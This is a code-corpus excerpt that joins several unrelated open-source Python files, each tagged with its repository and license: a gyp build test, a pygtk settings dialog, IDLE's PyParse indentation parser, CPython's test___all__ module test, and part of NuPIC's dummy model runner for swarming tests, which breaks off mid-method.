test.build('build/all.gyp', test.ALL, chdir='relocate/noload')
test.run_built_executable('exe', chdir='relocate/noload',
stdout='Hello from shared.c.\n')
# Just sanity test that NO_LOAD=lib doesn't break anything.
test.build('build/all.gyp', test.ALL, chdir='relocate/noload',
arguments=['NO_LOAD=lib'])
test.run_built_executable('exe', chdir='relocate/noload',
stdout='Hello from shared.c.\n')
test.build('build/all.gyp', test.ALL, chdir='relocate/noload',
arguments=['NO_LOAD=z'])
test.run_built_executable('exe', chdir='relocate/noload',
stdout='Hello from shared.c.\n')
# Make sure we can rebuild without reloading the sub .mk file.
with open('relocate/noload/main.c', 'a') as src_file:
src_file.write("\n")
test.build('build/all.gyp', test.ALL, chdir='relocate/noload',
arguments=['NO_LOAD=lib'])
test.run_built_executable('exe', chdir='relocate/noload',
stdout='Hello from shared.c.\n')
# Change shared.c, but verify that it doesn't get rebuild if we don't load it.
with open('relocate/noload/lib/shared.c', 'w') as shared_file:
shared_file.write(
'#include "shared.h"\n'
'const char kSharedStr[] = "modified";\n'
)
test.build('build/all.gyp', test.ALL, chdir='relocate/noload',
arguments=['NO_LOAD=lib'])
test.run_built_executable('exe', chdir='relocate/noload',
stdout='Hello from shared.c.\n')
test.pass_test()
| apache-2.0 |
alonsebastian/Kaanna | GUI tester.py | 1 | 2140 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import pygtk, gtk
import sys
from conf.conf import Config
class App (Config):
def __init__(self): #initialize every important widget that we will interact with.
#bring all the file where the GUI is described
Config.__init__(self, "conf/")
self.uifile = "Resources/Configurations.ui"
self.wTree = gtk.Builder()
self.wTree.add_from_file(self.uifile)
#connect the signals
self.wTree.connect_signals(self)
#bring all the different widgets and hide/show the window/dialogs
self.checkbutton1 = self.wTree.get_object("checkbutton1")
self.checkbutton2 = self.wTree.get_object("checkbutton2")
self.checkbutton3 = self.wTree.get_object("checkbutton3")
self.checkbutton4 = self.wTree.get_object("checkbutton4")
self.window = self.wTree.get_object("window1")
self.window.show()
if self.general_notifications:
self.checkbutton1.set_active(1)
if self.general_hotkey:
self.checkbutton2.set_active(1)
if self.general_clipboardtraslation:
self.checkbutton3.set_active(1)
if self.general_strartOnTray:
self.checkbutton4.set_active(1)
def cancel(self, widget):
sys.exit()
def save_changes(self, widget):
if self.checkbutton1.get_active():
self.change_general_notifications(True)
else:
self.change_general_notifications(False)
if self.checkbutton2.get_active():
self.change_general_hotkey(True)
else:
self.change_general_hotkey(False)
if self.checkbutton3.get_active():
self.change_general_clipboardtraslation(True)
else:
self.change_general_clipboardtraslation(False)
if self.checkbutton4.get_active():
self.change_general_strartontray(True)
else:
self.change_general_strartontray(False)
self.save()
print 'Changes saved'
sys.exit()
if __name__ == "__main__":
GUI = App()
gtk.main()
| gpl-2.0 |
adminneyk/codificacionproyectando | application/views/Generacion/Generacion/lib/openoffice/openoffice.org/basis3.4/program/python-core-2.6.1/lib/idlelib/PyParse.py | 185 | 19510 | import re
import sys
# Reason last stmt is continued (or C_NONE if it's not).
(C_NONE, C_BACKSLASH, C_STRING_FIRST_LINE,
C_STRING_NEXT_LINES, C_BRACKET) = range(5)
if 0: # for throwaway debugging output
def dump(*stuff):
sys.__stdout__.write(" ".join(map(str, stuff)) + "\n")
# Find what looks like the start of a popular stmt.
_synchre = re.compile(r"""
^
[ \t]*
(?: while
| else
| def
| return
| assert
| break
| class
| continue
| elif
| try
| except
| raise
| import
| yield
)
\b
""", re.VERBOSE | re.MULTILINE).search
# Match blank line or non-indenting comment line.
_junkre = re.compile(r"""
[ \t]*
(?: \# \S .* )?
\n
""", re.VERBOSE).match
# Match any flavor of string; the terminating quote is optional
# so that we're robust in the face of incomplete program text.
_match_stringre = re.compile(r"""
\""" [^"\\]* (?:
(?: \\. | "(?!"") )
[^"\\]*
)*
(?: \""" )?
| " [^"\\\n]* (?: \\. [^"\\\n]* )* "?
| ''' [^'\\]* (?:
(?: \\. | '(?!'') )
[^'\\]*
)*
(?: ''' )?
| ' [^'\\\n]* (?: \\. [^'\\\n]* )* '?
""", re.VERBOSE | re.DOTALL).match
# Match a line that starts with something interesting;
# used to find the first item of a bracket structure.
_itemre = re.compile(r"""
[ \t]*
[^\s#\\] # if we match, m.end()-1 is the interesting char
""", re.VERBOSE).match
# Match start of stmts that should be followed by a dedent.
_closere = re.compile(r"""
\s*
(?: return
| break
| continue
| raise
| pass
)
\b
""", re.VERBOSE).match
# Chew up non-special chars as quickly as possible. If match is
# successful, m.end() less 1 is the index of the last boring char
# matched. If match is unsuccessful, the string starts with an
# interesting char.
_chew_ordinaryre = re.compile(r"""
[^[\](){}#'"\\]+
""", re.VERBOSE).match
# Build translation table to map uninteresting chars to "x", open
# brackets to "(", and close brackets to ")".
_tran = ['x'] * 256
for ch in "({[":
_tran[ord(ch)] = '('
for ch in ")}]":
_tran[ord(ch)] = ')'
for ch in "\"'\\\n#":
_tran[ord(ch)] = ch
_tran = ''.join(_tran)
del ch
try:
UnicodeType = type(unicode(""))
except NameError:
UnicodeType = None
class Parser:
def __init__(self, indentwidth, tabwidth):
self.indentwidth = indentwidth
self.tabwidth = tabwidth
def set_str(self, str):
assert len(str) == 0 or str[-1] == '\n'
if type(str) is UnicodeType:
# The parse functions have no idea what to do with Unicode, so
# replace all Unicode characters with "x". This is "safe"
# so long as the only characters germane to parsing the structure
# of Python are 7-bit ASCII. It's *necessary* because Unicode
# strings don't have a .translate() method that supports
# deletechars.
uniphooey = str
str = []
push = str.append
for raw in map(ord, uniphooey):
push(raw < 127 and chr(raw) or "x")
str = "".join(str)
self.str = str
self.study_level = 0
# Return index of a good place to begin parsing, as close to the
# end of the string as possible. This will be the start of some
# popular stmt like "if" or "def". Return None if none found:
# the caller should pass more prior context then, if possible, or
# if not (the entire program text up until the point of interest
# has already been tried) pass 0 to set_lo.
#
# This will be reliable iff given a reliable is_char_in_string
# function, meaning that when it says "no", it's absolutely
# guaranteed that the char is not in a string.
def find_good_parse_start(self, is_char_in_string=None,
_synchre=_synchre):
str, pos = self.str, None
if not is_char_in_string:
# no clue -- make the caller pass everything
return None
# Peek back from the end for a good place to start,
# but don't try too often; pos will be left None, or
# bumped to a legitimate synch point.
limit = len(str)
for tries in range(5):
i = str.rfind(":\n", 0, limit)
if i < 0:
break
i = str.rfind('\n', 0, i) + 1 # start of colon line
m = _synchre(str, i, limit)
if m and not is_char_in_string(m.start()):
pos = m.start()
break
limit = i
if pos is None:
# Nothing looks like a block-opener, or stuff does
# but is_char_in_string keeps returning true; most likely
# we're in or near a giant string, the colorizer hasn't
# caught up enough to be helpful, or there simply *aren't*
# any interesting stmts. In any of these cases we're
# going to have to parse the whole thing to be sure, so
# give it one last try from the start, but stop wasting
# time here regardless of the outcome.
m = _synchre(str)
if m and not is_char_in_string(m.start()):
pos = m.start()
return pos
# Peeking back worked; look forward until _synchre no longer
# matches.
i = pos + 1
while 1:
m = _synchre(str, i)
if m:
s, i = m.span()
if not is_char_in_string(s):
pos = s
else:
break
return pos
# Throw away the start of the string. Intended to be called with
# find_good_parse_start's result.
def set_lo(self, lo):
assert lo == 0 or self.str[lo-1] == '\n'
if lo > 0:
self.str = self.str[lo:]
# As quickly as humanly possible <wink>, find the line numbers (0-
# based) of the non-continuation lines.
# Creates self.{goodlines, continuation}.
def _study1(self):
if self.study_level >= 1:
return
self.study_level = 1
# Map all uninteresting characters to "x", all open brackets
# to "(", all close brackets to ")", then collapse runs of
# uninteresting characters. This can cut the number of chars
# by a factor of 10-40, and so greatly speed the following loop.
str = self.str
str = str.translate(_tran)
str = str.replace('xxxxxxxx', 'x')
str = str.replace('xxxx', 'x')
str = str.replace('xx', 'x')
str = str.replace('xx', 'x')
str = str.replace('\nx', '\n')
# note that replacing x\n with \n would be incorrect, because
# x may be preceded by a backslash
# March over the squashed version of the program, accumulating
# the line numbers of non-continued stmts, and determining
# whether & why the last stmt is a continuation.
continuation = C_NONE
level = lno = 0 # level is nesting level; lno is line number
self.goodlines = goodlines = [0]
push_good = goodlines.append
i, n = 0, len(str)
while i < n:
ch = str[i]
i = i+1
# cases are checked in decreasing order of frequency
if ch == 'x':
continue
if ch == '\n':
lno = lno + 1
if level == 0:
push_good(lno)
# else we're in an unclosed bracket structure
continue
if ch == '(':
level = level + 1
continue
if ch == ')':
if level:
level = level - 1
# else the program is invalid, but we can't complain
continue
if ch == '"' or ch == "'":
# consume the string
quote = ch
if str[i-1:i+2] == quote * 3:
quote = quote * 3
firstlno = lno
w = len(quote) - 1
i = i+w
while i < n:
ch = str[i]
i = i+1
if ch == 'x':
continue
if str[i-1:i+w] == quote:
i = i+w
break
if ch == '\n':
lno = lno + 1
if w == 0:
# unterminated single-quoted string
if level == 0:
push_good(lno)
break
continue
if ch == '\\':
assert i < n
if str[i] == '\n':
lno = lno + 1
i = i+1
continue
# else comment char or paren inside string
else:
# didn't break out of the loop, so we're still
# inside a string
if (lno - 1) == firstlno:
# before the previous \n in str, we were in the first
# line of the string
continuation = C_STRING_FIRST_LINE
else:
continuation = C_STRING_NEXT_LINES
continue # with outer loop
if ch == '#':
# consume the comment
i = str.find('\n', i)
assert i >= 0
continue
assert ch == '\\'
assert i < n
if str[i] == '\n':
lno = lno + 1
if i+1 == n:
continuation = C_BACKSLASH
i = i+1
# The last stmt may be continued for all 3 reasons.
# String continuation takes precedence over bracket
# continuation, which beats backslash continuation.
if (continuation != C_STRING_FIRST_LINE
and continuation != C_STRING_NEXT_LINES and level > 0):
continuation = C_BRACKET
self.continuation = continuation
# Push the final line number as a sentinel value, regardless of
# whether it's continued.
assert (continuation == C_NONE) == (goodlines[-1] == lno)
if goodlines[-1] != lno:
push_good(lno)
def get_continuation_type(self):
self._study1()
return self.continuation
# study1 was sufficient to determine the continuation status,
# but doing more requires looking at every character. study2
# does this for the last interesting statement in the block.
# Creates:
# self.stmt_start, stmt_end
# slice indices of last interesting stmt
# self.stmt_bracketing
# the bracketing structure of the last interesting stmt;
# for example, for the statement "say(boo) or die", stmt_bracketing
# will be [(0, 0), (3, 1), (8, 0)]. Strings and comments are
# treated as brackets, for the matter.
# self.lastch
# last non-whitespace character before optional trailing
# comment
# self.lastopenbracketpos
# if continuation is C_BRACKET, index of last open bracket
def _study2(self):
if self.study_level >= 2:
return
self._study1()
self.study_level = 2
# Set p and q to slice indices of last interesting stmt.
str, goodlines = self.str, self.goodlines
i = len(goodlines) - 1
p = len(str) # index of newest line
while i:
assert p
# p is the index of the stmt at line number goodlines[i].
# Move p back to the stmt at line number goodlines[i-1].
q = p
for nothing in range(goodlines[i-1], goodlines[i]):
# tricky: sets p to 0 if no preceding newline
p = str.rfind('\n', 0, p-1) + 1
# The stmt str[p:q] isn't a continuation, but may be blank
# or a non-indenting comment line.
if _junkre(str, p):
i = i-1
else:
break
if i == 0:
# nothing but junk!
assert p == 0
q = p
self.stmt_start, self.stmt_end = p, q
# Analyze this stmt, to find the last open bracket (if any)
# and last interesting character (if any).
lastch = ""
stack = [] # stack of open bracket indices
push_stack = stack.append
bracketing = [(p, 0)]
while p < q:
# suck up all except ()[]{}'"#\\
m = _chew_ordinaryre(str, p, q)
if m:
# we skipped at least one boring char
newp = m.end()
# back up over totally boring whitespace
i = newp - 1 # index of last boring char
while i >= p and str[i] in " \t\n":
i = i-1
if i >= p:
lastch = str[i]
p = newp
if p >= q:
break
ch = str[p]
if ch in "([{":
push_stack(p)
bracketing.append((p, len(stack)))
lastch = ch
p = p+1
continue
if ch in ")]}":
if stack:
del stack[-1]
lastch = ch
p = p+1
bracketing.append((p, len(stack)))
continue
if ch == '"' or ch == "'":
# consume string
# Note that study1 did this with a Python loop, but
# we use a regexp here; the reason is speed in both
# cases; the string may be huge, but study1 pre-squashed
# strings to a couple of characters per line. study1
# also needed to keep track of newlines, and we don't
# have to.
bracketing.append((p, len(stack)+1))
lastch = ch
p = _match_stringre(str, p, q).end()
bracketing.append((p, len(stack)))
continue
if ch == '#':
# consume comment and trailing newline
bracketing.append((p, len(stack)+1))
p = str.find('\n', p, q) + 1
assert p > 0
bracketing.append((p, len(stack)))
continue
assert ch == '\\'
p = p+1 # beyond backslash
assert p < q
if str[p] != '\n':
# the program is invalid, but can't complain
lastch = ch + str[p]
p = p+1 # beyond escaped char
# end while p < q:
self.lastch = lastch
if stack:
self.lastopenbracketpos = stack[-1]
self.stmt_bracketing = tuple(bracketing)
# Assuming continuation is C_BRACKET, return the number
# of spaces the next line should be indented.
def compute_bracket_indent(self):
self._study2()
assert self.continuation == C_BRACKET
j = self.lastopenbracketpos
str = self.str
n = len(str)
origi = i = str.rfind('\n', 0, j) + 1
j = j+1 # one beyond open bracket
# find first list item; set i to start of its line
while j < n:
m = _itemre(str, j)
if m:
j = m.end() - 1 # index of first interesting char
extra = 0
break
else:
# this line is junk; advance to next line
i = j = str.find('\n', j) + 1
else:
# nothing interesting follows the bracket;
# reproduce the bracket line's indentation + a level
j = i = origi
while str[j] in " \t":
j = j+1
extra = self.indentwidth
return len(str[i:j].expandtabs(self.tabwidth)) + extra
# Return number of physical lines in last stmt (whether or not
# it's an interesting stmt! this is intended to be called when
# continuation is C_BACKSLASH).
def get_num_lines_in_stmt(self):
self._study1()
goodlines = self.goodlines
return goodlines[-1] - goodlines[-2]
# Assuming continuation is C_BACKSLASH, return the number of spaces
# the next line should be indented. Also assuming the new line is
# the first one following the initial line of the stmt.
def compute_backslash_indent(self):
self._study2()
assert self.continuation == C_BACKSLASH
str = self.str
i = self.stmt_start
while str[i] in " \t":
i = i+1
startpos = i
# See whether the initial line starts an assignment stmt; i.e.,
# look for an = operator
endpos = str.find('\n', startpos) + 1
found = level = 0
while i < endpos:
ch = str[i]
if ch in "([{":
level = level + 1
i = i+1
elif ch in ")]}":
if level:
level = level - 1
i = i+1
elif ch == '"' or ch == "'":
i = _match_stringre(str, i, endpos).end()
elif ch == '#':
break
elif level == 0 and ch == '=' and \
(i == 0 or str[i-1] not in "=<>!") and \
str[i+1] != '=':
found = 1
break
else:
i = i+1
if found:
# found a legit =, but it may be the last interesting
# thing on the line
i = i+1 # move beyond the =
found = re.match(r"\s*\\", str[i:endpos]) is None
if not found:
# oh well ... settle for moving beyond the first chunk
# of non-whitespace chars
i = startpos
while str[i] not in " \t\n":
i = i+1
return len(str[self.stmt_start:i].expandtabs(\
self.tabwidth)) + 1
# Return the leading whitespace on the initial line of the last
# interesting stmt.
def get_base_indent_string(self):
self._study2()
i, n = self.stmt_start, self.stmt_end
j = i
str = self.str
while j < n and str[j] in " \t":
j = j + 1
return str[i:j]
# Did the last interesting stmt open a block?
def is_block_opener(self):
self._study2()
return self.lastch == ':'
# Did the last interesting stmt close a block?
def is_block_closer(self):
self._study2()
return _closere(self.str, self.stmt_start) is not None
# index of last open bracket ({[, or None if none
lastopenbracketpos = None
def get_last_open_bracket_pos(self):
self._study2()
return self.lastopenbracketpos
# the structure of the bracketing of the last interesting statement,
# in the format defined in _study2, or None if the text didn't contain
# anything
stmt_bracketing = None
def get_last_stmt_bracketing(self):
self._study2()
return self.stmt_bracketing
| mit |
dya2/python-for-android | python3-alpha/python3-src/Lib/test/test___all__.py | 89 | 3951 | import unittest
from test import support
import os
import sys
class NoAll(RuntimeError):
pass
class FailedImport(RuntimeError):
pass
class AllTest(unittest.TestCase):
def check_all(self, modname):
names = {}
with support.check_warnings(
(".* (module|package)", DeprecationWarning),
("", ResourceWarning),
quiet=True):
try:
exec("import %s" % modname, names)
except:
# Silent fail here seems the best route since some modules
# may not be available or not initialize properly in all
# environments.
raise FailedImport(modname)
if not hasattr(sys.modules[modname], "__all__"):
raise NoAll(modname)
names = {}
try:
exec("from %s import *" % modname, names)
except Exception as e:
# Include the module name in the exception string
self.fail("__all__ failure in {}: {}: {}".format(
modname, e.__class__.__name__, e))
if "__builtins__" in names:
del names["__builtins__"]
keys = set(names)
all = set(sys.modules[modname].__all__)
self.assertEqual(keys, all)
def walk_modules(self, basedir, modpath):
for fn in sorted(os.listdir(basedir)):
path = os.path.join(basedir, fn)
if os.path.isdir(path):
pkg_init = os.path.join(path, '__init__.py')
if os.path.exists(pkg_init):
yield pkg_init, modpath + fn
for p, m in self.walk_modules(path, modpath + fn + "."):
yield p, m
continue
if not fn.endswith('.py') or fn == '__init__.py':
continue
yield path, modpath + fn[:-3]
def test_all(self):
# Blacklisted modules and packages
blacklist = set([
# Will raise a SyntaxError when compiling the exec statement
'__future__',
])
if not sys.platform.startswith('java'):
# In case _socket fails to build, make this test fail more gracefully
# than an AttributeError somewhere deep in CGIHTTPServer.
import _socket
# rlcompleter needs special consideration; it import readline which
# initializes GNU readline which calls setlocale(LC_CTYPE, "")... :-(
try:
import rlcompleter
import locale
except ImportError:
pass
else:
locale.setlocale(locale.LC_CTYPE, 'C')
ignored = []
failed_imports = []
lib_dir = os.path.dirname(os.path.dirname(__file__))
for path, modname in self.walk_modules(lib_dir, ""):
m = modname
blacklisted = False
while m:
if m in blacklist:
blacklisted = True
break
m = m.rpartition('.')[0]
if blacklisted:
continue
if support.verbose:
print(modname)
try:
# This heuristic speeds up the process by removing, de facto,
# most test modules (and avoiding the auto-executing ones).
with open(path, "rb") as f:
if b"__all__" not in f.read():
raise NoAll(modname)
self.check_all(modname)
except NoAll:
ignored.append(modname)
except FailedImport:
failed_imports.append(modname)
if support.verbose:
print('Following modules have no __all__ and have been ignored:',
ignored)
print('Following modules failed to be imported:', failed_imports)
def test_main():
support.run_unittest(AllTest)
if __name__ == "__main__":
test_main()
| apache-2.0 |
SaganBolliger/nupic | src/nupic/swarming/DummyModelRunner.py | 31 | 25451 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import copy
import itertools
import json
import math
import os
import random
import sys
import time
from nupic.frameworks.opf.modelfactory import ModelFactory
from nupic.frameworks.opf import opfhelpers
from nupic.frameworks.opf.opfutils import ModelResult
from nupic.swarming.hypersearch import utils
from nupic.swarming.ModelRunner import OPFModelRunner
class OPFDummyModelRunner(OPFModelRunner):
""" This class runs a 'dummy' OPF Experiment. It will periodically update the
models db with a deterministic metric value. It can also simulate different
amounts of computation time
"""
modelIndex = 0
metrics = [lambda x: float(x+1),
lambda x: 100.0 - x-1,
lambda x: 20.0 * math.sin(x),
lambda x: (x/9.0)**2]
_DEFAULT_PARAMS = dict(delay= None,
finalDelay=None,
waitTime=None,
randomizeWait=None,
iterations=1,
metricFunctions=None,
metricValue=None,
finalize=True,
permutationParams={},
experimentDirectory=None,
makeCheckpoint=False,
sysExitModelRange=None,
delayModelRange=None,
exitAfter=None,
errModelRange=None,
sleepModelRange=None,
jobFailErr=False,
)
# Dummy streamDef.
_DUMMY_STREAMDEF = dict(
version = 1,
info = "test_NoProviders",
streams = [
dict(source="file://%s" % (os.path.join("extra", "hotgym",
"joined_mosman_2011.csv")),
info="hotGym.csv",
columns=["*"],
#last_record=-1,
),
],
aggregation = {
'hours': 1,
'fields': [
('consumption', 'sum'),
('timestamp', 'first'),
('TEMP', 'mean'),
('DEWP', 'mean'),
#('SLP', 'mean'),
#('STP', 'mean'),
('MAX', 'mean'),
('MIN', 'mean'),
('PRCP', 'sum'),
],
},
)
def __init__(self,
modelID,
jobID,
params,
predictedField,
reportKeyPatterns,
optimizeKeyPattern,
jobsDAO,
modelCheckpointGUID,
logLevel=None,
predictionCacheMaxRecords=None):
"""
Parameters:
-------------------------------------------------------------------------
modelID: ID of this model in the models table
jobID:
params: a dictionary of parameters for this dummy model. The
possible keys are:
delay: OPTIONAL-This specifies the amount of time
(in seconds) that the experiment should wait
before STARTING to process records. This is
useful for simulating workers that start/end
at different times
finalDelay: OPTIONAL-This specifies the amount of time
(in seconds) that the experiment should wait
before it conducts its finalization operations.
These operations include checking if the model
is the best model, and writing out checkpoints.
waitTime: OPTIONAL-The amount of time (in seconds)
to wait in a busy loop to simulate
computation time on EACH ITERATION
randomizeWait: OPTIONAL-([0.0-1.0] ). Default:None
If set to a value, the above specified
wait time will be randomly be dithered by
+/- <randomizeWait>% of the specfied value.
For example, if randomizeWait=0.2, the wait
time will be dithered by +/- 20% of its value.
iterations: OPTIONAL-How many iterations to run the model
for. -1 means run forever (default=1)
metricFunctions: OPTIONAL-A list of single argument functions
serialized as strings, which return the metric
value given the record number.
Mutually exclusive with metricValue
metricValue: OPTIONAL-A single value to use for the metric
value (used to debug hypersearch).
Mutually exclusive with metricFunctions
finalize: OPTIONAL-(True/False). Default:True
When False, this will prevent the model from
recording it's metrics and performing other
functions that it usually performs after the
model has finished running
permutationParams: A dict containing the instances of all the
variables being permuted over
experimentDirectory: REQUIRED-An absolute path to a directory
with a valid description.py file.
NOTE: This does not actually affect the
running of the model or the metrics
produced. It is required to create certain
objects (such as the output stream)
makeCheckpoint: True to actually write a checkpoint out to
disk (default: False)
sysExitModelRange: A string containing two integers 'firstIdx,
endIdx'. When present, if we are running the
firstIdx'th model up to but not including the
endIdx'th model, then do a sys.exit() while
running the model. This causes the worker to
exit, simulating an orphaned model.
delayModelRange: A string containing two integers 'firstIdx,
endIdx'. When present, if we are running the
firstIdx'th model up to but not including the
endIdx'th model, then do a delay of 10 sec.
while running the model. This causes the
worker to run slower and for some other worker
to think the model should be orphaned.
exitAfter: The number of iterations after which the model
should perform a sys exit. This is an
alternative way of creating an orphaned model
that use's the dummmy model's modelIndex
instead of the modelID
errModelRange: A string containing two integers 'firstIdx,
endIdx'. When present, if we are running the
firstIdx'th model up to but not including the
endIdx'th model, then raise an exception while
running the model. This causes the model to
fail with a CMPL_REASON_ERROR reason
sleepModelRange: A string containing 3 integers 'firstIdx,
endIdx: delay'. When present, if we are running
the firstIdx'th model up to but not including
the endIdx'th model, then sleep for delay
seconds at the beginning of the run.
jobFailErr: If true, model will raise a JobFailException
which should cause the job to be marked as
failed and immediately cancel all other workers.
predictedField: Name of the input field for which this model is being
optimized
reportKeyPatterns: list of items from the results dict to include in
the report. These can be regular expressions.
optimizeKeyPattern: Which report item, if any, we will be optimizing for.
This can also be a regular expression, but is an error
if it matches more than one key from the experiment's
results.
jobsDAO: Jobs data access object - the interface to the
jobs database which has the model's table.
modelCheckpointGUID:
A persistent, globally-unique identifier for
constructing the model checkpoint key
logLevel: override logging level to this value, if not None
predictionCacheMaxRecords:
Maximum number of records for the prediction output cache.
Pass None for the default value.
"""
super(OPFDummyModelRunner, self).__init__(modelID=modelID,
jobID=jobID,
predictedField=predictedField,
experimentDir=None,
reportKeyPatterns=reportKeyPatterns,
optimizeKeyPattern=optimizeKeyPattern,
jobsDAO=jobsDAO,
modelCheckpointGUID=modelCheckpointGUID,
logLevel=logLevel,
predictionCacheMaxRecords=None)
self._predictionCacheMaxRecords = predictionCacheMaxRecords
self._streamDef = copy.deepcopy(self._DUMMY_STREAMDEF)
self._params = copy.deepcopy(self._DEFAULT_PARAMS)
# -----------------------------------------------------------------------
# Read the index of the current model in the test
if 'permutationParams' in params \
and '__model_num' in params['permutationParams']:
self.modelIndex=params['permutationParams']['__model_num']
else:
self.modelIndex = OPFDummyModelRunner.modelIndex
OPFDummyModelRunner.modelIndex += 1
# -----------------------------------------------------------------------
self._loadDummyModelParameters(params)
# =========================================================================
# Load parameters into instance variables
# =========================================================================
self._logger.debug("Using Dummy model params: %s", self._params)
self._busyWaitTime = self._params['waitTime']
self._iterations = self._params['iterations']
self._doFinalize = self._params['finalize']
self._delay = self._params['delay']
self._sleepModelRange = self._params['sleepModelRange']
self._makeCheckpoint = self._params['makeCheckpoint']
self._finalDelay = self._params['finalDelay']
self._exitAfter = self._params['exitAfter']
# =========================================================================
# Randomize Wait time, if necessary
# =========================================================================
self.randomizeWait = self._params['randomizeWait']
if self._busyWaitTime is not None:
self.__computeWaitTime()
# =========================================================================
# Load the appropriate metric value or metric function
# =========================================================================
if self._params['metricFunctions'] is not None \
and self._params['metricValue'] is not None:
raise RuntimeError("Error, only 1 of 'metricFunctions' or 'metricValue'"\
" can be passed to OPFDummyModelRunner params ")
self.metrics = None
self.metricValue = None
if self._params['metricFunctions'] is not None:
self.metrics = eval(self._params['metricFunctions'])
elif self._params['metricValue'] is not None:
self.metricValue = float(self._params['metricValue'])
else:
self.metrics = OPFDummyModelRunner.metrics[0]
# =========================================================================
# Create an OpfExperiment instance, if a directory is specified
# =========================================================================
if self._params['experimentDirectory'] is not None:
self._model = self.__createModel(self._params['experimentDirectory'])
self.__fieldInfo = self._model.getFieldInfo()
# =========================================================================
# Get the sysExit model range
# =========================================================================
self._sysExitModelRange = self._params['sysExitModelRange']
if self._sysExitModelRange is not None:
self._sysExitModelRange = [int(x) for x in self._sysExitModelRange.split(',')]
# =========================================================================
# Get the delay model range
# =========================================================================
self._delayModelRange = self._params['delayModelRange']
if self._delayModelRange is not None:
self._delayModelRange = [int(x) for x in self._delayModelRange.split(',')]
# =========================================================================
# Get the errModel range
# =========================================================================
self._errModelRange = self._params['errModelRange']
if self._errModelRange is not None:
self._errModelRange = [int(x) for x in self._errModelRange.split(',')]
self._computModelDelay()
# Get the jobFailErr boolean
self._jobFailErr = self._params['jobFailErr']
self._logger.debug("Dummy Model %d params %r", self._modelID, self._params)
def _loadDummyModelParameters(self, params):
""" Loads all the parameters for this dummy model. For any paramters
specified as lists, read the appropriate value for this model using the model
index """
for key, value in params.iteritems():
if type(value) == list:
index = self.modelIndex % len(params[key])
self._params[key] = params[key][index]
else:
self._params[key] = params[key]
def _computModelDelay(self):
""" Computes the amount of time (if any) to delay the run of this model.
This can be determined by two mutually exclusive parameters:
delay and sleepModelRange.
'delay' specifies the number of seconds a model should be delayed. If a list
is specified, the appropriate amount of delay is determined by using the
model's modelIndex property.
However, this doesn't work when testing orphaned models, because the
modelIndex will be the same for every recovery attempt. Therefore, every
recovery attempt will also be delayed and potentially orphaned.
'sleepModelRange' doesn't use the modelIndex property for a model, but rather
sees which order the model is in the database, and uses that to determine
whether or not a model should be delayed.
"""
# 'delay' and 'sleepModelRange' are mutually exclusive
if self._params['delay'] is not None \
and self._params['sleepModelRange'] is not None:
raise RuntimeError("Only one of 'delay' or "
"'sleepModelRange' may be specified")
# Get the sleepModel range
if self._sleepModelRange is not None:
range, delay = self._sleepModelRange.split(':')
delay = float(delay)
range = map(int, range.split(','))
modelIDs = self._jobsDAO.jobGetModelIDs(self._jobID)
modelIDs.sort()
range[1] = min(range[1], len(modelIDs))
# If the model is in range, add the delay
if self._modelID in modelIDs[range[0]:range[1]]:
self._delay = delay
else:
self._delay = self._params['delay']
def _getMetrics(self):
""" Protected function that can be overridden by subclasses. Its main purpose
is to allow the the OPFDummyModelRunner to override this with deterministic
values
Returns: All the metrics being computed for this model
"""
metric = None
if self.metrics is not None:
metric = self.metrics(self._currentRecordIndex+1)
elif self.metricValue is not None:
metric = self.metricValue
else:
raise RuntimeError('No metrics or metric value specified for dummy model')
return {self._optimizeKeyPattern:metric}
def run(self):
""" Runs the given OPF task against the given Model instance """
self._logger.debug("Starting Dummy Model: modelID=%s;" % (self._modelID))
# =========================================================================
# Initialize periodic activities (e.g., for model result updates)
# =========================================================================
periodic = self._initPeriodicActivities()
self._optimizedMetricLabel = self._optimizeKeyPattern
self._reportMetricLabels = [self._optimizeKeyPattern]
# =========================================================================
# Create our top-level loop-control iterator
# =========================================================================
if self._iterations >= 0:
iterTracker = iter(xrange(self._iterations))
else:
iterTracker = iter(itertools.count())
# =========================================================================
# This gets set in the unit tests. It tells the worker to sys exit
# the first N models. This is how we generate orphaned models
doSysExit = False
if self._sysExitModelRange is not None:
modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
modelIDs = [x[0] for x in modelAndCounters]
modelIDs.sort()
(beg,end) = self._sysExitModelRange
if self._modelID in modelIDs[int(beg):int(end)]:
doSysExit = True
if self._delayModelRange is not None:
modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
modelIDs = [x[0] for x in modelAndCounters]
modelIDs.sort()
(beg,end) = self._delayModelRange
if self._modelID in modelIDs[int(beg):int(end)]:
time.sleep(10)
# DEBUG!!!! infinite wait if we have 50 models
#if len(modelIDs) >= 50:
# jobCancel = self._jobsDAO.jobGetFields(self._jobID, ['cancel'])[0]
# while not jobCancel:
# time.sleep(1)
# jobCancel = self._jobsDAO.jobGetFields(self._jobID, ['cancel'])[0]
if self._errModelRange is not None:
modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
modelIDs = [x[0] for x in modelAndCounters]
modelIDs.sort()
(beg,end) = self._errModelRange
if self._modelID in modelIDs[int(beg):int(end)]:
raise RuntimeError("Exiting with error due to errModelRange parameter")
# =========================================================================
# Delay, if necessary
if self._delay is not None:
time.sleep(self._delay)
# =========================================================================
# Run it!
# =========================================================================
self._currentRecordIndex = 0
while True:
# =========================================================================
# Check if the model should be stopped
# =========================================================================
# If killed by a terminator, stop running
if self._isKilled:
break
# If job stops or hypersearch ends, stop running
if self._isCanceled:
break
# If model is mature, stop running ONLY IF we are not the best model
# for the job. Otherwise, keep running so we can keep returning
# predictions to the user
if self._isMature:
if not self._isBestModel:
self._cmpReason = self._jobsDAO.CMPL_REASON_STOPPED
break
else:
self._cmpReason = self._jobsDAO.CMPL_REASON_EOF
# =========================================================================
# Get the the next record, and "write it"
# =========================================================================
try:
